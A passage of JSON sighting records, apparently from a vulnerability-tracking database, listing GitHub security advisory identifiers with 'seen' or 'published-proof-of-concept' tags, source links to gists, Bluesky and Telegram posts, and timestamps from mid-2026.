"2026-08-08T04:05:29.637232Z"}, {"uuid": "e800bfbd-7c26-4ffc-ae1f-0f8b496c37bf", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-c9w5-rwh3-7pm9", "type": "seen", "source": "https://gist.github.com/alon710/888e29b3ee03ee26d9a2341be25e1c36", "content": "", "creation_timestamp": "2026-08-08T05:33:09.044717Z"}, {"uuid": "45aa7f12-d243-4c0d-b988-44ed08f9b878", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-wcx4-wpfv-mc5c", "type": "seen", "source": "https://gist.github.com/alon710/990635ffdd01b8358cf96c18cad137b7", "content": "", "creation_timestamp": "2026-08-08T07:36:05.523818Z"}, {"uuid": "8154170c-afd3-4296-bd57-3b79e851ddf5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "ghsa-h4mf-4v27-hggj", "type": "seen", "source": "https://bsky.app/profile/getpacketai.bsky.social/post/3mskm3mosqt2l", "content": "", "creation_timestamp": "2026-08-08T08:00:20.728857Z"}, {"uuid": "c3163b48-ccf3-47ff-8407-92b9dc252c7d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-29g2-3rmr-qm68", "type": "seen", "source": "https://gist.github.com/alon710/47ff7eb96677e04e1cb388be69ae9049", "content": "", "creation_timestamp": "2026-08-08T08:31:57.951821Z"}, {"uuid": "eb935511-a964-49bc-a5da-b7b2266cb5dd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-7C4V-FWGW-9RF7", "type": "seen", "source": "https://gist.github.com/alon710/9318966a289b67d09be3b424c52f31ab", "content": "", "creation_timestamp": "2026-08-08T09:31:21.430122Z"}, {"uuid": "c1b3cb59-277e-444a-85a7-e89381e30da4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-qgq7-7hm3-q39j", "type": "seen", "source": "https://gist.github.com/alon710/71d0ff9c71dc1f5ee8e40bba3da46014", "content": "", "creation_timestamp": "2026-08-08T10:39:06.980746Z"}, {"uuid": "f5a970a0-8fdb-41e7-9486-26f40cd9981e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-wpqr-6v78-jr5g", "type": "seen", "source": "https://gist.github.com/dev-krish-xyz/7604ca4e2ca8081e4e1481b4aa8e3585", "content": "", "creation_timestamp": "2026-08-08T11:48:00.043784Z"}, {"uuid": "67679080-80cf-4ad8-97ab-22e8a2ba88f2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-hc8v-wwc9-vgxm", "type": "seen", "source": "https://gist.github.com/alon710/96191d79926d3727c699122d4f73553a", "content": "", "creation_timestamp": "2026-08-08T11:33:31.460311Z"}, {"uuid": "a862cd0a-48b6-4457-80a4-ce28aace73fe", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-HHV7-P4PG-WM6P", "type": "seen", "source": "https://t.me/Intel_Encyclopedia/865", "content": "", "creation_timestamp": "2026-08-09T04:17:03.250790Z"}, {"uuid": "da6a508c-174e-4c02-bb22-2222d93c8abb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-HHV7-P4PG-WM6P", "type": "seen", "source": "https://t.me/Intel_Encyclopedia/925", "content": "", "creation_timestamp": "2026-08-09T04:17:03.118462Z"}, {"uuid": "5ddcd32d-29c6-4e13-ab87-04556b09102b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "CISCO-SA-20190513-SECUREBOOT", "type": "seen", "source": "Telegram/7Dig03ZzYy6YuIMrxr0eoO8Sk_-WmRTHI4lqp_Q9NI8qVQ", "content": "", "creation_timestamp": "2026-08-09T05:11:07.694926Z"}, {"uuid": "ac7ae9a8-ccca-41fc-82f2-f54316f59f9a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-4h98-2769-gh6h", "type": "seen", "source": "https://gist.github.com/ababove20-jpg/a8895e46c71323c60c78cc166d2e033c", "content": "", "creation_timestamp": "2026-08-09T07:07:53.050670Z"}, {"uuid": "0ad5aad8-8de2-4d80-afa9-185c08105bd5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-8pcw-h6w9-h46g", "type": "seen", "source": "https://gist.github.com/alon710/596ae516160a36b600032831d0a4ec2c", "content": "", "creation_timestamp": "2026-09-24T01:31:30.618383Z"}, {"uuid": "62ca5229-1dfb-4f81-8860-eb59c77d3fe1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-5426-92w4-wvhv", "type": "seen", "source": "https://gist.github.com/alon710/596ae516160a36b600032831d0a4ec2c", "content": "", "creation_timestamp": "2026-09-24T01:31:30.592370Z"}, {"uuid": "97cf8981-0f28-46c1-8b45-a82904089cd4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-8PCW-H6W9-H46G", "type": "seen", "source": "https://gist.github.com/alon710/7f0f12c0172cdde9df1216f891a6caa8", "content": "", "creation_timestamp": "2026-09-24T00:31:40.768236Z"}, {"uuid": "b3dfe2cc-712c-491a-80f0-6a317ab40454", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-wmw4-mw6x-6vfm", "type": "seen", "source": "https://gist.github.com/alon710/3dbddf53ea2ffbacecef5870088d9a78", "content": "", "creation_timestamp": "2026-09-23T23:31:11.744332Z"}, {"uuid": "7ccc9c3d-00f8-4199-83e3-60b99bd6715c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-9643-4qgh-g8mx", "type": "seen", "source": "https://gist.github.com/alon710/57af1221d4a8dd965c728b35cf4f28c3", "content": "", "creation_timestamp": "2026-09-23T22:31:39.409419Z"}, {"uuid": "44eda82f-49b1-42bd-9ed4-29671af7bfe4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-vqg6-3fw6-j9jg", "type": "seen", "source": "https://gist.github.com/alon710/d6b528cbaf62fdf12beeb49959443071", "content": "", "creation_timestamp": "2026-09-24T21:30:35.000000Z"}, {"uuid": "3dfebcad-a93a-4aae-8a96-b276e9e619eb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-w6f5-v2h6-g786", "type": "seen", "source": "https://bsky.app/profile/scoutmonitoring.bsky.social/post/3mwc7awf4ie2c", "content": "", "creation_timestamp": "2026-09-24T21:30:08.903007Z"}, {"uuid": "42a60555-3426-424e-84ca-d3fabe7c67e0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-87mg-5grr-rhwh", "type": "seen", "source": "https://gist.github.com/alon710/3dbcce796ff94299654f0a5d9373d275", "content": "", "creation_timestamp": "2026-09-24T20:30:32.000000Z"}, {"uuid": "6e099d8e-5abf-4402-aa11-bc90f6a928dd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-g28h-2cmm-rj9x", "type": "seen", "source": "https://bsky.app/profile/standup.thecompound.tech/post/3mwbyv4cfl72w", "content": "", "creation_timestamp": "2026-09-24T19:36:09.773660Z"}, {"uuid": "ee456eb1-b4a9-4e54-a453-f4dbf8f14e72", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-g28h-2cmm-rj9x", "type": "seen", "source": "https://bsky.app/profile/standup.thecompound.tech/post/3mwbyv3eatq2w", "content": "", "creation_timestamp": "2026-09-24T19:36:09.207123Z"}, {"uuid": "14d2f808-1358-4f59-bc3b-ec026c4e17e1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-396x-xmvh-p563", "type": "seen", "source": "https://gist.github.com/alon710/428e2262f37bf99385b17c721990d4f3", "content": "", "creation_timestamp": "2026-09-24T19:30:32.000000Z"}, {"uuid": "7c449e4d-f029-41e8-b5ed-9248ab2c44d4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-fx76-2j3w-2mx6", "type": "seen", "source": "https://gist.github.com/alon710/d50e2ea115088fc75fbdb4a4d8d12c2c", "content": "", "creation_timestamp": "2026-09-24T18:30:33.000000Z"}, {"uuid": "b94de0af-76d4-417f-a87a-33c8ddc1c97d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-hxcx-9h4f-42xx", "type": "seen", "source": "https://gist.github.com/alon710/6b2fccc524523c2e698955d59741fc2e", "content": "", "creation_timestamp": "2026-09-24T17:30:29.000000Z"}, {"uuid": "f4e396cc-14e5-4a2a-bf44-068e7ae20439", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-632h-h47v-g4x4", "type": "seen", "source": "https://bsky.app/profile/securitylabs.datadoghq.com/post/3mwbj3vhank2x", "content": "", "creation_timestamp": "2026-09-24T14:53:39.595225Z"}, {"uuid": "8b911202-94c8-4a0a-a816-7773c0105a48", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-wcfm-jp7m-rffh", "type": "seen", "source": "https://bsky.app/profile/glitterbean.wehavecookies.social.ap.brid.gy/post/3mwbeh3cfyva2", "content": "", "creation_timestamp": "2026-09-24T13:30:46.755888Z"}, {"uuid": "9dcc03ca-b525-4eb3-bafb-4a658a25ffa8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-pg59-5vwg-4jxq", "type": "seen", "source": "https://gist.github.com/alon710/0e253d405fcab64a2a0b8acc04c1d0c4", "content": "", "creation_timestamp": "2026-09-22T20:31:35.850086Z"}, {"uuid": "87e2ee72-ce55-422c-9ba5-034802a98110", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-7hp8-65ch-5whp", "type": "seen", "source": "https://bsky.app/profile/hn100.atproto.rocks/post/3mw52yevdvr27", "content": "", "creation_timestamp": "2026-09-22T20:30:40.360217Z"}, {"uuid": "29da7ca5-fd9f-436d-a47f-5643d05efc02", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-jx63-h26r-8cph", "type": "seen", "source": "https://gist.github.com/alon710/b536815814568f1fe4f87321daa1216e", "content": "", "creation_timestamp": "2026-09-22T19:32:27.082607Z"}, {"uuid": "4c096b0a-6f93-4c0c-8ffb-fc4bd42ae667", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-5mj8-gf6m-fhw8", "type": "seen", "source": "https://gist.github.com/alon710/bf3a865551bb5c97cbf5b48608ac9014", "content": "", "creation_timestamp": "2026-09-22T18:32:29.213839Z"}, {"uuid": "761944e7-23fc-4f39-9506-c35d1b5ad3e9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-7hp8-65ch-5whp", "type": "seen", "source": "https://bsky.app/profile/betterhn50.e-work.xyz/post/3mw4txgd4hw2z", "content": "", "creation_timestamp": "2026-09-22T18:24:40.207102Z"}, {"uuid": "1454d283-6859-4f51-a8a5-acbebd9187c8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-F36J-F34J-H3RX", "type": "seen", "source": "https://t.me/pphm_HackerNews/3255", "content": "", "creation_timestamp": "2026-09-22T18:09:01.000000Z"}, {"uuid": "e686dcb4-e08b-4c01-bb88-7d4f48035c2b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-vcvr-r3jv-pc5j", "type": "seen", "source": "https://bsky.app/profile/standup.thecompound.tech/post/3mw4rj42j6x2t", "content": "", "creation_timestamp": "2026-09-22T17:40:52.645627Z"}, {"uuid": "ae077b8c-1094-46d3-a3d4-26285a2ddc35", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-32gc-64m7-hj7v", "type": "seen", "source": "https://gist.github.com/alon710/cfe610105c4dec5cb69ce6f35d82ab7c", "content": "", "creation_timestamp": "2026-09-22T17:31:57.727643Z"}, {"uuid": "4f9a2962-0833-4b76-b9b2-939af345b85a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-7hp8-65ch-5whp", "type": "seen", "source": "https://bsky.app/profile/betterhn20.e-work.xyz/post/3mw4qmuifdb2a", "content": "", "creation_timestamp": "2026-09-22T17:25:05.009130Z"}, {"uuid": "6225c262-419e-46c6-b1ef-f0f01b4a2529", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-7hp8-65ch-5whp", "type": "seen", "source": "https://bsky.app/profile/hackernewstop5.bsky.social/post/3mw4q5p4vtu2j", "content": "", "creation_timestamp": "2026-09-22T17:16:35.630432Z"}, {"uuid": "d298af3b-af7b-476d-b5e0-cddcebfb5bd5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-7hp8-65ch-5whp", "type": "seen", "source": "https://bsky.app/profile/hnbot.gsuscs.xyz/post/3mw4pblusck2t", "content": "", "creation_timestamp": "2026-09-22T17:00:52.471153Z"}, {"uuid": "c6543abe-67d1-46eb-955e-d2a726b0d345", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-29hq-23m2-2j47", "type": "seen", "source": "https://gist.github.com/alon710/0d291d38492cd0f426b608e184326562", "content": "", "creation_timestamp": "2026-09-22T16:31:56.337452Z"}, {"uuid": "f561a516-a38c-4d2b-bc7f-e645f87d1b30", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-3xm7-qw7j-qc8v", "type": "seen", "source": "https://gist.github.com/alon710/3ba8e1fcc936f8ea3f0b915b4e9e571b", "content": "", "creation_timestamp": "2026-09-22T15:32:08.571179Z"}, {"uuid": "780d6450-1b7f-494c-8ae6-2853db674f8c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-g84h-j7jj-x32p", "type": "seen", "source": "https://gist.github.com/alon710/3ba8e1fcc936f8ea3f0b915b4e9e571b", "content": "", "creation_timestamp": "2026-09-22T15:32:08.486544Z"}, {"uuid": "ec832d99-5d90-476d-9063-c6d98ab71c37", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-798p-78g2-v556", "type": "seen", "source": "https://gist.github.com/alon710/3ba8e1fcc936f8ea3f0b915b4e9e571b", "content": "", "creation_timestamp": "2026-09-22T15:32:08.446422Z"}, {"uuid": "e805d0ce-de10-49a6-97eb-0d2dc3eb99af", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-72VJ-PVM4-MM7X", "type": "published-proof-of-concept", "source": "https://t.me/bdufstecru/3445", "content": "", "creation_timestamp": "2026-09-16T00:00:30.170004Z"}, {"uuid": "7092332f-44c4-4b3a-a4ba-ea8f6dd944d8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-R3J6-GPJW-QFJR", "type": "published-proof-of-concept", "source": "https://t.me/bdufstecru/3437", "content": "", "creation_timestamp": "2026-09-16T00:00:29.840050Z"}, {"uuid": "404144a2-aa8a-43ba-8a91-1507944476c2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-RVX4-FFVW-M9Q3", "type": "published-proof-of-concept", "source": "https://t.me/bdufstecru/3440", "content": "", "creation_timestamp": "2026-09-16T00:00:29.743862Z"}, {"uuid": "6003f35b-b2df-4964-9f66-d2c2974b2d7e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-W6F5-V2H6-G786", "type": "published-proof-of-concept", "source": "https://t.me/bdufstecru/3436", "content": "", "creation_timestamp": "2026-09-16T00:00:29.589799Z"}, {"uuid": "70d528dc-9633-44f9-b31e-e0d8dc61ce70", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-7GWW-X7FH-JF9J", "type": "published-proof-of-concept", "source": "https://t.me/bdufstecru/3433", "content": "", "creation_timestamp": "2026-09-16T00:00:14.280008Z"}, {"uuid": "1a7b65fb-b31d-48bf-b4f0-fa3159d9c535", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-2h44-8472-frjj", "type": "seen", "source": "https://bsky.app/profile/standup.thecompound.tech/post/3mvlprda2mw2w", "content": "", "creation_timestamp": "2026-09-15T22:54:25.240304Z"}, {"uuid": "80277e86-efa7-4ec6-825f-f6a430152858", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-2883-xcg3-v3hh", "type": "seen", "source": "https://gist.github.com/konard/86e72407d37c7131edeff2e1e52b5626", "content": "", "creation_timestamp": "2026-09-15T12:45:46.276190Z"}, {"uuid": "3a07e343-6a03-4e15-9cee-91afc467b34d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-p498-v437-472g", "type": "seen", "source": "https://gist.github.com/konard/86e72407d37c7131edeff2e1e52b5626", "content": "", "creation_timestamp": "2026-09-15T12:45:43.369636Z"}, {"uuid": "e0186f26-d4df-4f49-bb11-4c8b55c3e22e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-gh8f-v7fj-8cj2", "type": "seen", "source": "https://gist.github.com/maxbro1992/6c89390c80f987e251e3979a9c98ceb6", "content": "", "creation_timestamp": "2026-09-15T07:04:48.098856Z"}, {"uuid": "5c3a8491-6f1e-4258-86e1-bc8264afef72", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-9qxx-2fgc-35r8", "type": "seen", "source": "https://gist.github.com/maxbro1992/6c89390c80f987e251e3979a9c98ceb6", "content": "", "creation_timestamp": "2026-09-15T07:04:48.058122Z"}, {"uuid": "072af52f-7e42-437a-a609-16c8b97fb615", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-2883-xcg3-v3hh", "type": "seen", "source": "https://gist.github.com/konard/3df64f94bedef28845e3787306d32d25", "content": "", "creation_timestamp": "2026-09-13T23:02:40.982352Z"}, {"uuid": "4f805167-35c2-4cbb-8078-aa94ecf16328", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-35q8-9mj6-wjmf", "type": "seen", "source": "https://bsky.app/profile/malwareobserver.bsky.social/post/3mrnmfzh6ff2o", "content": "", "creation_timestamp": "2026-07-27T19:18:57.104533Z"}, {"uuid": "db87d17f-953c-45e5-9683-94761ffddc94", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-pm35-fqvh-cq5g", "type": "seen", "source": "https://bsky.app/profile/malwareobserver.bsky.social/post/3mrnmdahelz2n", "content": "", "creation_timestamp": "2026-07-27T19:17:24.188193Z"}, {"uuid": "cd17c0d0-4bf1-4ec2-b8dc-101599965b41", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-hrxh-6v49-42gf", "type": "seen", "source": "https://gist.github.com/allanrogerr/6d10196ab8eb0d80a2cfca871b45d9a8", "content": "", "creation_timestamp": "2026-07-27T19:48:38.410906Z"}, {"uuid": "782278d9-60b8-47b9-bd19-0383f8a0916f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-259r-337f-4rfw", "type": "seen", "source": "https://gist.github.com/allanrogerr/6d10196ab8eb0d80a2cfca871b45d9a8", "content": "", "creation_timestamp": "2026-07-27T19:48:38.379253Z"}, {"uuid": "c26a17f8-5772-40cd-a263-9223796f0ade", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-VJH7-7G9H-FJFH", "type": "published-proof-of-concept", "source": "https://t.me/EchelonEyes/3678", "content": "", "creation_timestamp": "2026-07-28T00:00:51.643766Z"}, {"uuid": "bdc851f0-22c0-448b-a872-b77268a157f4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-5PW9-F9R4-MV2R", "type": "seen", "source": "https://t.me/EchelonEyes/2791", "content": "", "creation_timestamp": "2026-07-28T00:00:40.967795Z"}, {"uuid": "b1d4bde9-527a-482a-b17e-315a6293d222", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-93WV-JW9V-4972", "type": "published-proof-of-concept", "source": "https://t.me/bdufstecru/3345", "content": "", "creation_timestamp": "2026-07-28T00:00:32.048477Z"}, {"uuid": "fa55c9df-2f07-449d-9d94-155251cea5b8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-RCQ7-RV5G-J3R4", "type": "published-proof-of-concept", "source": "https://t.me/bdufstecru/3344", "content": "", "creation_timestamp": "2026-07-28T00:00:31.949978Z"}, {"uuid": "9c10ab89-8743-4b14-836e-72b40ded4e2c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-2RMR-XW8M-22Q9", "type": "published-proof-of-concept", "source": "https://t.me/EchelonEyes/2145", "content": "", "creation_timestamp": "2026-07-28T00:00:31.794519Z"}, {"uuid": "5d45e320-7d4c-433d-ad09-136b7da7c334", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-M2QF-HXJV-5GPQ", "type": "published-proof-of-concept", "source": "https://t.me/EchelonEyes/1499", "content": "", "creation_timestamp": "2026-07-28T00:00:08.583730Z"}, {"uuid": "15f10ecb-d003-4bfb-8d03-f13a8d28b9c9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-3735-5339-xfwx", "type": "seen", "source": "https://gist.github.com/alon710/10debd6350fb30cffecd8ed90a44aae9", "content": "", "creation_timestamp": "2026-07-28T17:31:58.866287Z"}, {"uuid": "b0bd6fda-267a-48ca-a9f3-928b08c99db7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-3fcr-jvgp-7f58", "type": "seen", "source": "https://gist.github.com/alon710/49b30b9938ae88ab2f795a5eb6f5b0cc", "content": "", "creation_timestamp": "2026-07-28T18:31:38.171209Z"}, {"uuid": "7fc4aeb4-07be-4b49-93ee-32014823bcd7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-85rg-p3fr-xc2f", "type": "seen", "source": "https://gist.github.com/alon710/543be0bac4447ae891730d56e63e4ffd", "content": "", "creation_timestamp": "2026-07-28T19:31:15.524407Z"}, {"uuid": "0c3a398b-c5da-42e4-b9da-05e41e8d5e75", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-pp92-crg2-gfv9", "type": "seen", "source": "https://gist.github.com/alon710/76a4f64bf3e94be3974678cdc55c68d9", "content": "", "creation_timestamp": "2026-07-28T20:31:48.792126Z"}, {"uuid": "2533cb96-14c6-4b41-be2a-6b8f2a80cc7a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-GV7G-JM28-CR3M", "type": "seen", "source": "https://t.me/true_secator/8452", "content": "", "creation_timestamp": "2026-07-28T21:00:04.969787Z"}, {"uuid": "c88a3c57-791a-4955-a4fd-d5099a3ba0d7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-v8vm-cqh8-q87q", "type": "seen", "source": "https://gist.github.com/alon710/f64be2d49b2d7a1297c03bef66babfa4", "content": "", "creation_timestamp": "2026-07-28T21:31:27.812226Z"}, {"uuid": "282f8de2-6cda-4fb8-a0e5-572f2a491177", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-rmxw-pq4x-3fvh", "type": "seen", "source": "https://gist.github.com/alon710/9b8006195456ffdcd967a102fe0db5d4", "content": "", "creation_timestamp": "2026-07-28T22:30:56.604851Z"}, 